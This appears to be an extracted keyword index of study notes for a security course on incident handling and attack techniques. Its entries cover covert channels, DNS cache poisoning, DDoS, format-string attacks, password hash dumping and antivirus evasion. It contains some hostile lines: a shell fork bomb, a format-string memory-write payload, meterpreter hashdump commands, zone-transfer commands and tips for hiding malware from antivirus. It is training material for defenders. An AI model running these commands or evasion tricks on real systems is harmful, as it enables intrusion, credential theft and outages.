--Keep attackers off system in the first place (apply least privilege)
Identification
--Know what processes should be running on your systems
Covert Channel: ----When a strange process starts running, investigate
5 129 ----Especially if t has admin/root privileges
Defenses
--Network-based IDS can analyze packets for:
----Shell commands in HTTP (for reverse www shell)
----Unusual data in ICMP messages (for ICMP tunnels)
------False positives associated with network management equipment
----Unusual changes in IP ID and Seq/Ack fields (for Covert_TCP) -- pretty hard to do
***Focus on egress traffic

Containment
--Delete attacker's program
Covert Channel: --Look for program on other systems
5 140 Eradication:
Defenses
--If attacker comprimosed admin/root account, rebuild system
Recovery:
--Monitor system very closely
 Keywords Book Page Remarks
using extra space in the TCP or IP Header
Covert Channels in TCP Covert_TCP
5 122
and IP Headers -Designed to transfer files
-Remarkably effective technique

You can carry any protocol on top of any other protocol

DNS
--DNSCat2
Quick UDP Internet Connection (QUICK)
--Use of multiplexed UDP connections for connections
Covert Channels: Other 5 127 Stream Control Transmission Protocol (SCTP)
--Also used multi-streaming to send data across multiple concurrent connections
--Supports multihoming so multiple endpoints can be used as failover
--This means it has built-in C2 server failover
The goal of attackers using odd protocols to transfer is to find new areas where existing signatures do not exist
Also, there are some issues with reassembly across multiple concurrent streams of data being sent
First protocol is encapsulated inside packets for second protocol
-Network only sees the second protocol

Encrypted data might be an obvious sign of intrustion

Not all backdoors se plaintext to transmit data
Many use other protocols
--HTTPS
Covert Channels: Plain --IPSEC
5 131
Sight --DNS
Others hide in plain sight:
--HTTP
Every custom web application has data and fields that are encoded and transmitted differently
--HTTP commonly has encoded portions (session data, etc.)
--attackers can hide by looking like normally encoded HTTP
Client and server are same executable
Covert_TCP 5 122, 123 Covert_TCP offers the ability to carry ASCII data in:
IP ID Field, Sequence Number Field, Acknowledgement Number Field

Ack mode (also known as bounce mode)

Most complex mode of operation for Covert_TCP is using the TCP acknowledgement sequence number, which applies in a
so-called "bounce" operation.

Covert_TCP: Bounce Step 0: Attacker establishes a Covert_TCP server on the receiving server, putting it in "ack" mode.
5 125
Mode Step 1: The client generates TCP SYN packets with a spoofed source address of the receiving server and a destination
address of the bounce server.
Step 2: The bounce server receives the packet. If the destination port on the bounce server is open, the bounce server will
send a SYN/ACK response.....(see page)
Step 3: The receiving server gets the SYN/ACK or RESET, recovers the character from the sequence number field, and
waits for more. The data is then gathered from the seq # and written to a local file
 Keywords Book Page Remarks

Transfer Trojan Horse backdoor commands or shell instead of just files

Bi-directional bounce attack
Covert_TCP: Extending Use other fields in the TCP, IP, and ICMP headers
5 126
the Ideas --Reserve space
--IP options
--ICMP message type
****See War Driving: CoWPAtty
CoWPAtty 2 65 A dictionary-based cracking tool for pre-shared keys with WPA1 and WPA2
-must sniff the 4-way handshake

CpuHOG (Denial of creates a process with a high priority on a Windows machine.Sets is priority level to 16, higher than all others
4 147 -could not be killed by windows apps
Service)
-took priority over all resources
Cracker 2 5 Someone who maliciously breaks into a system
Creating Evil Macros 3 145 see screenshot

Word macros are all the rage these days

And for the past 10+ years
However some users are getting warry of any macros in Word documents
Creating Malware: Why not use PowerPoint
3 144 --Because it does not support Auto_Open not Workbook_Open
Macros
--There will be another prompt for the user
--Two prompts = low probability of sucess
Once way is to create events for malware triggering
--Mouseover or clicking
We can also use Run_On_Open
CRIME 3 66 variant of BEAST that undermined HTTPS by focusing on compression routines
XP SP 2 and Later: only works with processors that support execution protection on the stack (NX)
Data Execution --marks memory pages as non-executable
3 128
Prevention --Metasploit modules can circumvent with return-oriented programming (ROP)

After target user input string has been identified, use standard database logic elements and see what happens!
Data Manipulation --Double dash (--): Comment delimiter
Across the Web (SQL 4 98 --Semicolon (;): Query terminator
Injection) --Asterisk (*): Wildcard selector
--Percent (%): Matches any substring
--Underscore(_): Matches any character
Other useful entities are OR, TRUE, 1=1, SELECT, JOIN, and UPDATE
You can view and edit anything that is passed to the browser
Any variable passed to the browser can be altered by user unless the application performs from integrity checks
Data Validation 4 141, 142 Sometimes, 99.99% of all state information is an application is covered
But on one screen, a single variable is passed in the clear without a hash or timestamp
With just one piece of unprotected state, the application is vulnerable
use a large number of compromised machines
The result is Distributed Denial of Service (DDoS)
DDoS - Attacks 4 156 In the past, attackers relied on specialized DDoS tools:
-Tribe Flood Network (TFN) and Tribe Flood Network 2000 (TFN2K)
Today, DDoS is usually launched using a botnet
 Keywords Book Page Remarks

- host-based IDS/IPS
-To prevent attackers from gaining root or SYSTEM
- Keep systems patched
DDoS - Defenses 4 163-164 - Utilize antivirus tools to prevent installation and remote detection
** Egress antispoof filters (extremely important)
-Design critical business systems with adequate redundancy

Tools: Arbor Networks Peakflow, Riverbed NetProfiler, Neustar SiteProtect, CloudFlare

- host-based IDS/IPS
-To prevent attackers from gaining root or SYSTEM
- Keep systems patched
DDoS - Defenses
4 163 - Utilize antivirus tools to prevent installation and remote detection
(Preparation)
** Egress antispoof filters (extremely important)
-Design critical business systems with adequate redundancy

Tools: Arbor Networks Peakflow, Riverbed NetProfiler, Neustar SiteProtect, CloudFlare

SYN floods:
--Typically Spoofed
--Clogs connection with bogus traffic
DDoS - Flood 4 160 --Easier for ISPs to block by looking for abnormal traffic patterns
HTTP Floods:
--3WH and send HTTP GET for common page, such as index.html
--Much harder to differentiate from normal traffic
Using the TCP three way handshake, an attacker can bounce a flood from the zombie to the victim
DDoS - Reflected 4 158 Zombie sends a SYN to legitimate site
Legit site sends a SYN/ACK to food the victim
Makes tracing the attack even more difficult
DDoS Architecture 4 157 view Diagram. At the top of the architecture, you have the attacker who uses a remote control tool or remote shell to
connect to one or more client machines.
DDoS: Additional ID: Massive flood of packets. Automated DDoS detection and throttling tools.Containment: Get ready to marshal the
4 164
Defenses incident response team of your ISP
 Keywords Book Page Remarks

Preparation:
--host-based IDS/IPS
--To prevent attackers from gaining root or SYSTEM
--Keep systems patched
--Utilize antivirus tools to prevent installation and remote detection
** Egress antispoof filters (extremely important)
-Design critical business systems with adequate redundancy

Tools: Arbor Networks Peakflow, Riverbed NetProfiler, Neustar SiteProtect, CloudFlare

DDoS: Defenses 4 163, 164
Identification:
--Massive flood of packets. Automated DDoS detection and throttling tools.

Containment:
--Get ready to marshal the incident response team of your ISP

Erad, Recov:N/A

to counter packers, use unpackers or debugger plugins

Defense: Reversing Immunity Debugger - Very popular free Windows debugger
5 20
Windows Executables --Ollydbg (windows) has dozen of unpacking scripts
www.openrce.org

StegExpose: Jave utility to detect stego in lossless images where Least Significant Bit (LSB) techniques
--This stego is where the LSBs which determine color are modified
Detecting Stego 5 149 --This leads to a very slight (think imperceptible) change of color made to the original image
Supports a number of different "detectors" or mathematical analysis techniques to detect stego
For quick analysis, it can also use "cheap" or quick analysis methods to detect the presense of stego
Has the ability to run on a large number of files very quickly
Determine Risk of Acquire logs and other source of info. How far did the attacker get? Make recommendation for longer term containment.
Contining Operations 1 111 Document recommenation in signed memo. Ultimately, it's a business decision but they are informed by incident handler's
(Containment) input.
Dictionary Attacks Involves using a predetermined list of passwords. It is the fastest method for cracking passwords.
4 11
(Password Cracking)
Digital Millennium
2 9
Copyrights Act (DMCA) Copyright protection and prohibitions against reverse engineering copy-protection schemes
checks the source address and interface on which the packet arrived to make sure they make sense. Requires admin to
Direct anti-spoof 3
configure each set of addresses expected on each interface, takes a lot of work
 Keywords Book Page Remarks

Stop storing LANMAN hashes in reg key:

- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
Disabling LANMAN -On the Edit menu, click Add Key, type NoLMHash, and click ok
4 32 Stop sending LANMAN Challenge/Response across the network:
Authentication***
LMCompatibilityLevel registry parameter
-Level 3- Send NTLMv2 authentication only- good for clients
-Level 5-Domain Controllers accepts only NTLMv2
Disabling Linux/Unix
Services Listening on 2 105 To stop a process on Linux or Unix, you can use the "kill [pid] or killall[process_name]. You can also disable service by
Ports reconfiguring inetd: or /etc/xinetd.d. You can also use #systemctl list-units --type service, #systemctl disable <service>

Method of attacker injecting code in the form of DLL directing into the victim EXE processes memory space.
DLL Injection requires several steps to be taken by the attacker, including:
--Allocating space in the victims process for the DLL code to occupy
--Allocating space in the victims process for the parameters required by the DLL to be injected into
DLL Injection 5 51 --Writing the name and code of the DLL into the memory space of the victim process
--Creating a thread in the victim process to actually run the newly injected DLL
--Freeing up resources in the victim process after execution is completed
--Overwriting API calls.
**You can see which accounts on your local Windows system have Debug privileges by going to Start -> Run and typing
"secpol.msc"
dlllist 5 23 Lists the DLLs loaded by a process, as well as the command-line invocation of a process
DMESG messages 2 68 Used to track all DHCP leases
Contains detailed info about target, to include external Ips
DNS 2 24 -attackers will use nslookup or dig to interact with DNS servers
** zone transfers can reveal information about the internal network
-should be disabled except to specific, known DNS servers
Clients use a "resolver" to access DNS servers
Most common DNS server is BIND (Berkeley Internet Name Domain)
DNS servers query each other
DNS does recursive queries. When a client wants to connect to a server it must resolve the server's name. The client's
resolver checks the local files to see if it already knows the IP address. If not, the client requests the mapping of name to
address (in the form of a DNS address record) from the local name server (which it locates based on information in
DNS 3 88 UNIX's /etc/resolv.conf or in the Windows network control panel). The local name server receives the query. If it has the
inforamtion cached from a previous lookup, it sends a response. If it doesnt have the information, it does a recursive
lookup. When doing a recursive lookup, the local name server consults with the root name server to see if it has the
address record. If the root name server does not have the information, it sends back a referral to the next server down the
line, the "org" server/ The local name server then queries the org name server.

DNS - Registration Make a similar-looking domain name

3 89
Attack
DNS Amplification attack that involve using spoofed packets against a 3rd party to amplify traffic to a target. Attack also involve sending small,
4 149
Attacks spoofed DNS queries to a series of DNS servers on the Internet.
 Keywords Book Page Remarks

The Domains Name System is full of useful information about a target

The attacker's goal is to discover as many IP addresses associated with the target domain as possible
The nslookup command can be used to interact with a DNS Server to this data
DNS and nslookup 2 24 --Included in modern versions of Windows
--Included in most UNIX implementations
--Deprecated in some UNIXes and limited on some Linux variants
Dig is another useful tool for DNS Recon
dns blacklists 3 132 looks for evil entries in DNS cache
Attempt to spoof DNS response to poison the cache
-Make the source port of DNS queries difficult to predict
-Do not accept piggybacked responses
DNS Cache Poisoning 3 88, 89 - use hard to predict Query IDs
-Configure external DNS servers to perform recursive queries only from internal systems
-keep DNS server updated

DNS Cache Poisoning - new technique to DNS poison

3 91, 92, 93
Kaminsky --sent random requests and brute-forced the response to generate an "evil" redirect
ID with nslookup, dig, or ping to check a DNS cache entry
--Flush DNS server cache
Containment
--Flush DNS server cache
--Procedure depends on DNS server type
DNS Cache Poisoning- Eradication and Recovery
3 97
Defenses --Make sure to upgrade DNS server ASAP
--Pseudo-random UDP source ports
--Difficult to guess DNS query IDs
--Consider split-split DNS if a frequent problem

DNS Cache Poisoning:

3 90
Scenario See screenshots

Make the source port of DNS queries difficult to predict

--That way, responses with bad port numbers are rejected
--Makes the attack more difficult, because bad guy must predict both Query ID number and UDP Port
DNS Cache Poisoning- --Patch your DNS servers
3 94 Do not accept piggybacked responses and use a hard to predict Query ID
Defenses: Preparation
--Keep DNS server (BIND, Windows DNS, DJB DNS, and others) up-to-date
Configure external DNS servers to perform recursice queries only for internal systems
--Dont let anyone on the Internet cause your external DNS server to do recursive look ups
--Prevent steps 1-4 from scenario
--A configuration option in major DNS server types
--This can be dodged by sending e-mail and causing the mail server to look up a name using the external name server
Use SSL (HTTPS) with server-side authentication
DNS Cache Poisoning- harden your DNS server
3 96
Defenses: Preparation Digitally sign DNS Records (DNSSEC)
DNS Cache Poisoning- Preparation: Use split-split DNS
Defenses: Split-Split 3 95 --Have a different DNS server resolve names for insiders and not respond to outside queries at all
DNS --Best current solution, but not widely useed (too complex/expensive)
 Keywords Book Page Remarks
DNS can be used to ID well-known botnets and C2 channels
DNS Data (Enterprise- -can spot anomalies and malicious IP addresses
1 133
Wide IR) ** Compare DNS cache to Malware Domain List, use tool like dns-blacklists.py

Preparation:
--Don’t allow zone transfers from just any system
----Limit zone transfers so primary DNS server accepts zone requests to be initiated only by secondary and tertiary DNS
servers, no one else
--Use split DNS
DNS Recon: Defense 2 27 ----External name information in external server
----Internal name information in internal server
--Make sure DNS servers are hardened
----All internal and external DNS servers
Identification:
--Look for zone transfers (in DNS server logs or data transferred to/from TCP port 53)
Cont, Erad, Recov: N/A

DNS Spoofing Effects 3 57 The attacker doesn’t have to be on the same LAN as the victim for DNS Spoofing to work
DNS Spoofing: Bettercap 3 58, 59
See screenshots
DNS Zone Transfer: Unix 2 26 dig @<DNS server> <target domain> -t AXFR
-limit zone transfers, split DNS b/w internal and external

By dumping records from your DNS servers, attackers can determine which machines are accessible on the Internet
Using nslookup, information can be gathered
DNS Zone Transfer: Type
2 25 --nslookup
Windows
--server [DNSServer]
--set type=any
--ls -d [domain]

Done on TCP port 53

Each DNS has a Query ID (sometimes called a Transaction ID number)
DNS: Extra 3 89 A response has the same Query ID number as an associated query
This Query ID may be predictable based on the earlier Query IDs
Also, to lower traffic requirements, DNS servers cache answers
dnscat2 5 127 Covert channel over DNS
Step 1: Run the DNSSPoof program, which listens for any DNS query for the target domain
Step 2: Victim tries to resolve a name using DNS
DNSSPoof 3 60 Step 3: Attacker sniffs DNS Request from the line
Step 4: Sends spoofed DNS response with any IP address the attacker wants the victim to use
Step 5: Victim now surfs to attacker's site instead of desired Destination
 Keywords Book Page Remarks

When registering a domain name the registrar requests

--Postal address
--Phone numbers
--Names of points of contact
Domain Name --Authoritative domain name servers
2 18 This information can be used in an attack
Registration
--Social engineering, war dialing, war driving, scanning

Contact names:social engineering, duping users via the telephone into giving up useful information
Telephone numbers: War dialing, finding unsecure modems to infiltrate an internal network
Postal addresses: War driving, finding unsecure wireless access points to attack
IP addresses: Scanning, looking for openings in the target
Doo 4 78 tool that searches for VMWare-specific virtualized hardware
DoS - Amplification Send a small spoofed DNS query to several DNS servers
4 150 - 153
Attacks -all the DNS servers respond to victim with packet flood
sets is priority level to 16, higher than all others
DoS - CpuHOG 4 147 -could not be killed by windows apps
-took priority over all resources
Stopping Services and Exhausting Resources (pg 147)
DoS - Denial of Service 4 146 --CPUhog is a resource exhaustive local DoS
You can also locally DoS a Linux system with a fork bomb
- :(){:|:&};:

With EDNS (RFC 2671), a DNS Query can specify a larger buffer (bigger than 512 bytes) for the response
- attacker sends 60 byte query to get a 4000 byte response
-Has been used in attacks to generate well over 10 Gbps of traffic at the target
DoS - EDNS 4 150 ***attacker needs DNS Servers supporting recursive lookups
-attacker queries those servers for a DNS name the attacker owns
-attacker's DNS caches 4000 byte response on those servers
-poisoned DNS caches are used to amplify DNS response flood
Two types of Denial of Service attacks:
DoS: Types 4 147 --Local DoS
--Network based
Driftnet 3 53 Doesn't even send the second HTTP request to fetch data. Instead, it monitors HTTP looking for JPEG images, which it
sniffs and reconstitutes on the screen
Driftnet It monitors HTTP looking for JPEG images
Drive Duplicator and drive duplicators are nice but may not capture unallocated space
Write Blockers 1 110 -Consider buying write-blocking hardware, Tableau for ex
(Containment) -Destination drive bigger than source drive, at lest 10%
droidsheep 3 63 mobile firesheep. Downgrades SSL to http
Dsniff 2 6 Suite of tools make sniffing and spying easy
 Keywords Book Page Remarks

Step 1: Run the DNSSPoof program and webmitm or sshmitm

Step 2: Victim tries to resolve a name using DNS
Step 3: The victims browser establishes an SSL connection (with the webmitm process on the attackers machine)
Dsniff - SSL and SSH 2 6 Step 4: Webmitm establishes its own SSL connection with the real destination web server
Step 5: The victim sees a message saying that the wen server's cert isn't signed by a recognized Cert Aut(CA). But, most
users simply continue the session! As the user accesses the website all traffic appears on the attackers machine
The same process applies for SSH
Essentially, webmitm and sshmitm are proxy tools used to exploit a trust model based on the user knowing what is okay
and what is not

Dsniff, arpspoof, macof, tcpkill,tcpnice, msgsnarf,filesnarf, mailsnarf, URLsnarf, WebSpy, DNSSpoof, Webmitm, SSHmitm
Dsniff Components 2 6 Dsniff is a suite sniffers and sniffer "helpers"
Dsniff, the master program of the suite, is merely a sniffer that decodes
See slie for protocols that are decoded by dsniff
Easy-Creds 2 67 Helps create malicious WAPs
Easy-Creds: Attack
2 68
Stack See page
push <reg>
Editing Assembly 3 149 pop <reg>
Where <reg> is the name of the register in the xor.

With physical access, an attacker could boot to Linix and edit the Windows logs directly with specialized tool
Editing Logs w/Physical A Linux boot disk for editing the Windows password database (SAM) can be found at http://pogostick.net/~pnh/ntpasswd
5 110 --Be careful when using this on a machine with EFS on Windows XP and 2003
Access
--You will likely lose the EFS keys if you change the password on them
This program cannot be used to edit logs

With EDNS (RFC 2671), a DNS Query can specify a larger buffer (bigger than 512 bytes) for the response
- attacker sends 60 byte query to get a 4000 byte response
EDNS (DNS -Has been used in attacks to generate well over 10 Gbps of traffic at the target
4 150 ***attacker needs DNS Servers supporting recursive lookups
Amplification Attack)
-attacker queries those servers for a DNS name the attacker owns
-attacker's DNS caches 4000 byte response on those servers
-poisoned DNS caches are used to amplify DNS response flood
Collect evidence as soon as you ID a problem:
-All logs from employee's server(s) and e-mail server(s)
E-Mail - Gathering -Logs from organization's mail relay(s), even if you are SURE it is internal
Evidence (Unauthorized 1 165 -Firewall/intrusion detection logs
Use) -When comparing logs, be certain to account for clock drift
**Problems tend to get to you long after they began, logs are perishable
 Keywords Book Page Remarks

95%+ of all infections come from a user clicking on something or getting phished
Cant we just say that most attackers just "Phish and be done"?
Endpoint Security AV Bypass
3 141
Bypass: External Access Application Whitelisting Bypass
AV_NG Bypass Tricks
Non-attribution

Backdoor factory
Endpoint Security Uses Code Caves
Bypass: Some Ebowla
3 151
Techniques (Application --Environmental Keyed Payloads + golang
Whitelisting) --Multiple formats
Try code signing your malware
Use tools and techniques to monitor a large network and ID compromise: Web proxy, DNS cache, Connection Logs
-use logs from network devices, etc.(firewall, DNS, proxy, router)
Enterprise-Wide IR 1 131 -serve as filter points for all traffic, can ID anomaly

enum 2 136 see SMB Enumeration, lab on pg 162

Get rid of the attacker's artifacts on the machine
Determine cause and symptoms of the incident
Eradication 1 116 - Use information gathered during identification and containment
- Try to isolate the attack and determine how it was executed
Usually against corporations, not governments
-motivated by money, stealing corporate data from competition
Many cases of unauthorized access to corporate systems are for espionage purpose
- typically involves a trusted insider

Espionage 1 158 Need to determine most likely targets (what, how, why, etc)
-ID how attackers would gain access, develop monitoring/controls
Thumbprint critical files and search for keywords
- Custom network-based IDS signatures
- Custom firewall/IPS signature-matching technology

Protect critical monitoring data:

- Records from badge access systems
- Phone records from your organization's PBX
Espionage - Maximize - Log books
1 161
Data Collection - System logs
- Network logs
- Surveillance videos

Espionage - Purposely
1 162
Deceiving the Attackers
If an outsider is collecting info, you may be able to provide erroneous info and actually benefit from the incident
Espionage -Identification 1 160 Pay attention to some indicators such as before/after hours access, work weekends,voluteering to empty paper recycling.
Pattern of access violations in audit trails. Leak seeding (media leaks)

Espionage Preparation -
1 159 Ask what the most probable targets of the activity are? What is the info worth? Who(outside the organization) might benefit
Target Analysis
from having it? What are all possible ways to acquire these targets? What are 2 or 3 most likely ways to acquire targets?
 Keywords Book Page Remarks
Session hijacker for Linux.
67 --Passive sniffing, with filter on IP or MAC address
Ettercap 3
71 -- active sniffing with ARP cache poisoning techniques;
Is any observable occurrence in a system and/or network.
EX: The system boot sequence--A system crash (could be normal behavior for that system)
Event Definition 1 12
***Must be recorded in notebooks and logs--
Recording the same event in multiple place helps improve evidence-that's corroborating evidence

msfvenom/Metasploit by default, utilizes a number of different template .exe files to inject malware into. While many AV
vendors have a difficult time writing the exact signature for a properly encoded malware, it is far easier to write a signature
for the wrapping .exe the malware is put into. So they write a signature for that. There is an interesting flag in msfvenom to
exe vs. exe-only 3 143 change format to exe-only rather than exe. This flag has the effect of either creating a new section header, or modifying
the existing .text section in the case of 64-bit binaries. In the case of 32-bit binaries, the shellcode ends up in the .text
section regardless, however, the characteristics flags differ and some extra assembly code are introduced in the exe-only
version
Incident handling is similar to first aid
The caregiver is under pressure and mistakes can be costly
A simple, well understood, documented approach is best
Keep the six stages in mind: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned
Use predesigned forms and ask for help
Executive Summary 1 14
-http://www.sans.org/score/incidentforms
-Forms include Incident Contact List, Identification Checklist, Eradication Checklist and Comm Log
Additional materials available are:
-NIST's Computer Security Incident Handling Guide, Revision 2

Extra Startup Items

1 70
(Windows Cheat Sheet)
It's helpful to check users' autostart folders. C:\> dir /s /b "C: \Documents and Settings\[user_name]\Start Menu\"
Eyewitness 2 99 Takes screenshots of websites, VNC and RDP servers
Rapid switching of bot controller
Fast Flux 4 70 --accomplioshed through DNS server friendly to attacker
--adds extra layers of obscurity
Rapid switching of bot controller
Fast Flux Bots 4 70 --accomplioshed through DNS server friendly to attacker
--adds extra layers of obscurity
The round-robin DNS records have a short DNS TTL:
Fast Flux: Round Robin 4 72 --Perhaps 3 to 10 minutes
--Continuously repopulated with new bots running transparent HTTP proxies
--Double-flux techniques make the attacker's DNS server fluctuate in a similar fashion
Fiddler 4 139 amazing proxy tool for analysis of HTTP requests and responses, with plugins that support altering scriptspassing through
the proxy on the fly, highlighted/colored components of HTTP and HTML to make them more readable.
 Keywords Book Page Remarks
Be careful with programs that parse protocols and files
-All network-using apps do
-Most other file-reading apps do as well
File and Protocol Parser -Pay special attention to your sniffer tools and their associated analysis programs
3 139
Vulnerabilities -Usually installed on sensitive networks (DMZ, data centers) to monitor
-Whenever you have wireshark, Snort, tcpdump, NetMon, or any other sniffer installed, make sure you keep patches up-
to-date

FilePwn 3 53 MitMf plugin that allows executable files to insert backdoors in transit
filescan 5 23 Lists the files that each process had open
filesnarf 3 51 Save files captured from NFS to local host
FIN Scans 2 94 Send packets with the FIN control bit set in an effort to be stealthy and get through firewall
Firebug-Browsers 4 137 Firefox web page and script editor and development tool
Firefox SSL Warning
3 61
Message See screenshots
firesheep 3 68 downgrades webpages from ssl to http; a method for avoiding SSL warnings

Used to send packets through a packet filter (firewall or router, no proxy) to determine which ports are open through it.
Firewalk 2
uses TTL on TCP or UDP. Needs the IP of the firewall, so the tool can try to walk through it by implementing TTL during
port scan
Firewalk Defense 2 Disallow ICMP Time Exceeded messages.
--Use a proxy server instead.
FOCA 2 41 automates search of file types on a webpage, can extract metadata

Step 1: Attacker runs the MitMf, which listens for any DNS query for target domain
Step 2: The victim runs a program that tries to resolve to the target domain name, such as a web browser.
Foiling DNS 3 56 Step 3: The tools sees the request. To sniff this request in a switched environment, the attacker may have to use the ARP
cache poisoning techniques dicusssed in ARP Spoofing, so that the attacker can see the DNS query traffic from the victim
Step 4: The MitMf tools sends a DNS response, spoofed to appear that it comes from th victim's DNS server. This response
includes a lie anout the IP address of the target domain.
Step 5: The victim now surfs whereever the attacker wants him/her to. The victim thinks it's the real destination.
Make a forensic, bit-by-bit image as soon as feasible
Forensics Images --take notes of all commands given and system responses
1 109 **Create a hash of the original and your images
(Containment)
Memory imaging can be done with Volatility or Memoryze
printf ("%s", buffer); red text= the format string
if you forget the %s.....printf(buffer); the buffer itself is interpreted as the format!
Format String - printf 3 141 Unfortunately, the wrong way still compiles without complaints
The wrong way also runs "properly"
- The program thinks the string is a format that looks like "[string_contacts]"
Attacker enters "%x %x %x" into user_input
-Becomes snprintf(buffer, sizeof buffer, "%x %x %x");
Format String - Read the -Buffer now contains the next three hexadecimal values on the stack
3 146
Stack -We're grabbing stuff from the stack
-By expanding this, we can grab the contents of various nearby locations in memory
 Keywords Book Page Remarks
snprintf (char *stf, size_t size, const char *format,…);
Format String - snprintf 3 144 Our program does
snprintf (buffer, size of buffer,.... user_input); <-----Forgot the format string in red
printf command has a weakness if used incorrectly
-Read arbitrary information from memory
Format String Attacks 3 140 -Manipulate information anywhere in memory
By manipulating information anywhere in memory, an attacker can have complete control over the victim process
-If victim process runs with root or admin privileges, attacker can own the system
Format String Attacks- user input contains quotes ("), %x, %d and/or %n, is likely a format string attack
3 143
Curious Use input
Format String- Writing Note that the memory location cannot contain a value of 0x00 in it, because this causes the printf function to stop
2 160
anywhere in Memory processing. Snprint, printf, sprintf always stop when they reach a null character (0x00)
The "%n" format in a printf command makes printf store the number of characters that should have been output before
encountering the %n
-This number is stored in an address space indicated by the next argument of printf
Format Strings - %n 3 148 printf("Hello world!%n", &variable);
-Loads the number 12 into variable
We are *writing* to memory using printf

Suppose the attacker wants to alter a variable at address 0xbffffaco

-attacker could try printing portions of the stack as we saw 2 slides
Attacker enters"\xco\xfa\xff\xbf%d%n" into user_input
snprintf (buffer, sizeof buffer, "\xc0\xfa\xff\xbf%d%n");

The character \xc0\xfa\xff\xbf are written to the string

hex translated into ASCII, four ASCII chars are printed into buffer
- That's 32 bits ( from the size of the address itself)
It sees the %d (for decimal integer), which prints the next value on the stack into the buffer (this won't get in the way)
Format Strings -
149 -
Rewriting Memory 3 %n makes it write the number of characters printed (5)
157
Locations -- In the memory space pointed to by its next argument, the buffer
The next item on the stack is the buffer, which we just loaded with 0xbfffac0
-We loaded them for the little endian Intel CPU
We just wrote the number 5 into memory location 0xbffffac0
***useful to change permssions
* minimum of 4 chars....cannot write a value smaller than 5

Preparation
-Your program developers must make sure they explicitly use format strings in all printf,sprintf, fprintf and snprintf function
calls
Format Strings- Awareness training for developers
2 164
Defenses Heavy use of grep to search for errors
-Insist that your vendors do the same
Deploy patches as they become available
Ident, Cont, Erad, Recov:
-Same as buffer overflow defenses
 Keywords Book Page Remarks
Attacker can alter the value stored at any memory address
Format Strings- So What 2 162 -Overwrite return pointers on the stack to redirect program execution to the attackers code
-Change parameters
- Change security settings (like an application-level user ID)
Foundscan 2 116 Commercial vulnerability scanner (web-based scanning service)
Lowest Offset
Fragmentation - First Wins Tie
2 119
Reassembly Methods Highest Offset
Last Wins Tie
Customizable fragmentation crafter, useful for IDS evasion
FragRoute 2 120 - Doesn't route, sits on NIC to frag packets from attack app
- Includes a language for defining specific twisted fragment attacks

FragRouter 3 52 IP forwarding will likely decrement the TTL of the packet as it moves to the outside world. An attacker could use FragRouter
configured not to fragment, with a simple change to the code commenting out the line that decrements the TTL
FTP Proxy "Bounce
2 94
Attack" scans Bounce an attack off a poorly configured FTP server
Full C2 backdoor where all Command and Control traffic flows over Gmail
Gcat 5 128 - Command execution, screen shots, download and upload files, keylogging, execution of shell code
-Bypasses many DLP/IDS/IPS systems
GECOS 4 36 This is a free-form field that can hold other information about the user
Generic Route
Encapsulation Redirector 4 74 Some bots can start a GRE (Generic Route Encapsulation) Redirector, so an attacker can send IP packets across a GRE
(GRE) Tunnel to an infected system
gets 3 99 vuln to buffer overflow, doesn’t boundary check

Processing of modifying the assembly on an executable in order to bypass antivirus, this is done via insertion of junk code

Ghostwriting 3 148 An attacker can simply:

1.) create an .exe
2.) convert it to an .asm file
3.) Edit the .asm file
4.) Convert it back to an .exe file
Google Cache 2 39 Search on "cache:www.google.com"
Brings up the cached version of the page
Google Hacking
2 35
Database a hacking database with more than 1,000 different useful searches to locate many problems on target domains.
Remove unwanted items from Google
Google: Remove Data 2 44 --File out request form
--Make specific change to page
Gresecurity 3 126 non-executable system stack, Linux, protects against buffer overflow
Linux, OS X, and Windows clients
GRR Rapid Response - Remote memory analysis via Rekall
1 39 Python-based agent
Preparation-
pull in-depth forensic artifacts from multiple systems asynchronously
Hacker 2 5 A highly intelligent individual who wants to explore technology to learn.
 Keywords Book Page Remarks
Hactivism 2 10 launching computer attacks to make a political point. The most common form is web-site tampering.

Can be obtained by:

--Dump hashes from the Domain Controller (admin)
--Use Cain, Abel, or pwdump tools
--Fizzgigls fgdump, which shuts down AV tools
--Use Metasploit Meterpreter's hashdump script to pull them from memory or hashdump command to pull from the registry
29
Hash Dumping 4 *meterpreter> hashdump <----pulls from memory
- 30
*meterpreter>run hashdump<-------pulls from registry

If not the admin:

-Boot into other OS and copy the SAM
-Obtain a copy form c:\windows\repair or backup directory
-Obtain a copy from a tape or emergency repair disk
-Sniff passwords off the network using Cain's sniffers
--useful for LANMAN Challenge/Response, NTLMv1, NTLMv3 or Kerberos pre-auth
Heartbleed 3 65 Allows attacker to pull server keys from memory
Hiding Files (NTFS) 5 99 See Covering: Tracks: Hiding Files (NTFS)
Easier to use interface
High Orbit Ion Cannon 4 162 Multithreaded so that it can launch more HTTP requests more quickly at target machines.
Support for a feature called boosters, which are simply customizable JavaScript-based scripts that cause HOIC to access
multiple pages on a target web server.
Hijacking 3 70 Two attack vectors:
--LLMNR, and Web Proxy Auto-detect (WPAD)

Hijacking synthesizes sniffing plus spoofing, the defenses for those attacks are combined for session hijacking.
Hard-code ARP tables on sensitive LANs
Activate port-level security on your switches
--Lock down each physical port to allow only a single MAC address
--Or lock down each physical port to allow only a specific MAC address
Hijacking Attack: Use dynamic ARP Inspect with DHCP snooping
3 75
Defenses Disable LLMNR and WPAD!!!
For defense against network-based hijacking attacks, encrypt session and use strong authentication
--Secure Shell (SSH v2) or VPN with encryption
--Especially important for critical infrastructure components
-- Dont telnet to your firewall,routers, directory systems, or PKI machines
If originating host is compromised, strong authentication and encrypted paths do not help, because session is stolen at
originating machine
Host Perimeter Detection
1 55
(Example) View Diagram
HTA Drive-By 3 53 MitMf attack that can insert malicious .hta files into the stream
 Keywords Book Page Remarks

Start with a dictionary

Concatenate items (numbers, letters) to the dictionary words:
More advanced hybrid attacks:
Hybrid Attacks
4 13 --Shave characters off the dictionary term
(Password Cracking)
--Make "leet" speak substitutions in dictionary terms
Sometimes referred to as word mangling
John the Ripper includes fantastic word-mangling rules for determining potential passwords

Hydan hides data in executables written for i386

-Supports BSD, Linux, and WinXP
Hydan 5 143, 145 -encrypts data with blowfish then embeds the data
Result: one executable, same size
**uses polymorphic coding techniques to hide data w/o altering funcitonality
-hide 1 byte per 150 bytes of code, alters statistical pattern of instructions
Hydan: Efficiency Rate Can hide 1 byte of data in appox. 150 bytes of code
5 148
and Detection Does alter the statistical pattern of instructions in a program

It just encrypts the message using blowfish

Next, it uses polymorphic coding techniques to hide the data
